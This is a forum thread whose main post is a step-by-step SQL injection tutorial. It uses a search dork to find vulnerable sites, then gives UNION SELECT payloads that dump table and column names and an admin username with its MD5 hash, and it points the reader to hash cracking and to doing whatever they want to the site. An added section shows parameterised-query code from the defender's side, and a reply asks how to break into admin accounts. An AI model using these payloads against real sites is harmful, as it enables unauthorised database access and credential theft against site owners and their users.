 SQL injection For Beginner :)

Roy Sukro (VIP Member)
Subject: SQL injection For Beginner :)    Posted Sun Dec 04, 2011 12:21 pm

In this tutorial you will understand how SQL injection is done, in a very simple way.

SQL INJECTION is an attack technique used to exploit web sites by altering backend SQL statements through manipulating application input.

Here we go!!

1. Search for a vulnerable site.
inurl:index.php?id=
You can get more dorks; this was just an example.

2. Suppose we have this one.

Code:
[You must be registered and logged in to see this link.]
We will check its vulnerability by adding a magic quote (') at the end of the URL.

3. So the URL will look like this:

[You must be registered and logged in to see this link.]

We hit enter and get this result.

Database error: Invalid SQL: SELECT * FROM NewsArticle WHERE NewsID=6\';
mySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1)
Database error: next_record called with no query pending.
mySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1)


If you get an error, some text missing, or a blank page, the site is vulnerable, but not always.

Now we know that the site is vulnerable.

4. The next step is to find out how many columns the database contains.
To find it we use "order by" (without the quotes) and this string " -- " (no quotes).

It will look like this:

[You must be registered and logged in to see this link.] order by 1-- (no error)

[You must be registered and logged in to see this link.] order by 2-- (no error)

[You must be registered and logged in to see this link.] order by 3-- (no error)

We move a little higher (it doesn't matter).

[You must be registered and logged in to see this link.] 10-- (no error)

[You must be registered and logged in to see this link.] 14-- (no error)


until we got an error:

[You must be registered and logged in to see this link.] 15-- (we got an error)

Now we got an error on this column; it will look like this:


Database error: Invalid SQL: SELECT * FROM NewsArticle WHERE NewsID=6 order by 15--;
mySQL Error: 1054 (Unknown column '15' in 'order clause')
Database error: next_record called with no query pending.
mySQL Error: 1054 (Unknown column '15' in 'order clause')


This means the database contains only 14 columns.

5. Now use "-" (negative quote) and the union select statement.

Using this we can select more data in one SQL statement.

Look like this:

[You must be registered and logged in to see this link.] union select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14--

We hit enter.

Numbers appear, like this:

6
, 5

8

6. Now we will check its MySQL version. We will put @@version in place of one of the numbers that appeared in the previous step.

Let me say I choose 8. We will replace 8 with @@version, so it will look like this:

[You must be registered and logged in to see this link.] 1, 2, 3, 4, 5, 6, 7, @@version, 9, 10, 11, 12, 13, 14--

And you will get a result like this:

6
, 5

5.1.32 <-- this is the version

Now we have the version ;-)

7. Getting the table name.

We use group_concat(table_name).
Replace @@version with group_concat(table_name),

and it will look like this:
[You must be registered and logged in to see this link.] union select 1, 2, 3, 4, 5, 6, 7, group_concat(table_name), 9, 10, 11, 12, 13, 14--

We're not done yet (don't hit enter):

between number 14 and this "--" insert this:

+from+information_schema.tables+where+table_schema=database()--

It will look like this:

[You must be registered and logged in to see this link.] union select 1, 2, 3, 4, 5, 6, 7, group_concat(table_name), 9, 10, 11, 12, 13, 14+from+information_schema.tables+where+table_schema=database()--

We hit enter and got this result:
Blurb,FileUpload,Inquiries,NewsArticle,ProjectPhoto,active_sessions_split,auth_user_md5

8. Now we're done with the table name, we move on to the column name.

Use this string: group_concat(column_name)

Replace group_concat(table_name) with group_concat(column_name).

But before that we must choose one column. I choose auth_user_md5 because this is a must, or what we want.

For a better result we need to hex auth_user_md5.

Go to this link: Click here! (TRANSLATOR, BINARY)

Paste auth_user_md5 into the text box and click encode.

Now we get the hex of auth_user_md5; it looks like this: 61 75 74 68 5f 75 73 65 72 5f 6d 64 35

Before proceeding, remove the spaces between the numbers, like this: 617574685f757365725f6d6435

Now replace group_concat(table_name) with group_concat(column_name),

like this:
[You must be registered and logged in to see this link.] union select 1, 2, 3, 4, 5, 6, 7, group_concat(column_name), 9, 10, 11, 12, 13, 14+from+information_schema.tables+where+table_schema=database()--

Replace also +from+information_schema.tables+where+table_schema=database()--
with
+from+information_schema.columns+where+table_name=0x617574685f757365725f6d6435--

(The yellow letters and numbers are the auth_user_md5 hex we encoded.)

Note: always add 0x before the hex, like above.

Here is the result:

[You must be registered and logged in to see this link.] union select 1, 2, 3, 4, 5, 6, 7, group_concat(column_name), 9, 10, 11, 12, 13, 14+from+information_schema.columns+where+table_name=0x617574685f757365725f6d6435--

Now hit enter, and you get a result like this:
UserID,Username,Password,Perms,FirstName,MiddleName,LastName,Position,EmailAddress,ContactNumbers,DateCreated,CreatedBy,DateModified,ModifiedBy,Status

9. We use 0x3a to obtain what we want from the database, like password, username, etc.

Replace group_concat(column_name) with group_concat(UserID,0x3a,Username,0x3a,Password,0x3a,Perms,0x3a,FirstName,0x3a,MiddleName,0x3a,LastName,0x3a,Position,0x3a,EmailAddress,0x3a,ContactNumbers,0x3a,DateCreated,0x3a,CreatedBy,0x3a,DateModified,0x3a,ModifiedBy,0x3a,Status)

But I prefer to do this one, group_concat(Username,0x3a,Password), for less effort.

And replace also information_schema.columns+where+table_name=0x617574685f757365725f6d6435-- with +from+auth_user_md5--

617574685f757365725f6d6435 is the hex value of auth_user_md5 so we replace it.

Result look like this:

[You must be registered and logged in to see this link.] union select 1, 2, 3, 4, 5, 6, 7,group_concat(Username,0x3a,Password), 9, 10, 11, 12, 13, 14+from+auth_user_md5--

I hit enter and we got this:
admin username: k2admin / admin
password in md5 hash:21232f297a57a5a743894a0e4a801fc3 / 97fda9951fd2d6c75ed53484cdc6ee2d

10. Because the password is an MD5 hash, we need to crack it.

Go to this link: Click here!
[You must be registered and logged in to see this link.]

We're done. It's up to you what you want to do to the site after cracking the MD5.
Congratulations!!!
__________________
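As an added example from the defender's side (this is not code from the post or from the forum), here is the concatenated query behind the "Invalid SQL" error quoted above next to a type-checked, parameterised version. It runs against an in-memory SQLite database with constructed tables named after the post's NewsArticle and auth_user_md5, hypothetical columns, and placeholder rows; SQLite's error text differs from MySQL's, but the behaviour of each function is the point.

```python
import sqlite3
# Constructed in-memory database: the post's table names (NewsArticle,
# auth_user_md5) with hypothetical columns and placeholder values.
def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE NewsArticle (NewsID INTEGER, Title TEXT, Body TEXT);
        INSERT INTO NewsArticle VALUES (6, 'Welcome', 'First article');
        CREATE TABLE auth_user_md5 (UserID INTEGER, Username TEXT, Password TEXT);
        INSERT INTO auth_user_md5 VALUES (1, 'admin', 'placeholder-md5-hash');
    """)
    return db

def fetch_article_vulnerable(db, raw_id):
    # The pattern behind the error message in the post: the request parameter
    # is concatenated into the SQL text, so it can change the statement.
    return db.execute("SELECT * FROM NewsArticle WHERE NewsID=" + raw_id).fetchall()

def fetch_article_safe(db, raw_id):
    # Hardened form: reject non-integer input, then bind it as a parameter so
    # the value can never be parsed as SQL.
    try:
        news_id = int(raw_id)
    except ValueError:
        raise ValueError("NewsID must be an integer") from None
    return db.execute("SELECT * FROM NewsArticle WHERE NewsID=?", (news_id,)).fetchall()

def demo():
    db = build_db()
    out = {}
    # Step 3 (stray quote) and step 4 (ORDER BY past the column count) both
    # surface as database errors, the signal the post tells the reader to look for.
    for name, payload in (("quote", "6'"), ("orderby", "6 order by 4--")):
        try:
            fetch_article_vulnerable(db, payload)
            out[name] = "no error"
        except sqlite3.OperationalError:
            out[name] = "error"
    # Step 9: UNION SELECT appends rows from a table the page never meant to show.
    rows = fetch_article_vulnerable(db, "6 union select UserID,Username,Password from auth_user_md5--")
    out["union_rows"] = len(rows)
    # The same inputs against the hardened function never reach SQL.
    out["rejected"] = 0
    for payload in ("6'", "6 order by 4--", "6 union select 1,2,3--"):
        try:
            fetch_article_safe(db, payload)
        except ValueError:
            out["rejected"] += 1
    out["safe_rows"] = len(fetch_article_safe(db, "6"))
    return out
```

In a real application the rejected requests are also worth logging, since a run of non-integer id values against one endpoint is exactly the probing sequence the post walks through.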
vampire77 (NuuBiiTooL)
Subject: Re: SQL injection For Beginner :)    Posted Mon Feb 11, 2013 11:50 pm

Bro, sorry, how do you open the admin user of a website that has a portal???
robofics (VIP Member)
Subject: Re: SQL injection For Beginner :)    Posted Fri Feb 15, 2013 9:05 am

vampire77 wrote:
Bro, sorry, how do you open the admin user of a website that has a portal???

Dude, this is an international forum. English only, please.
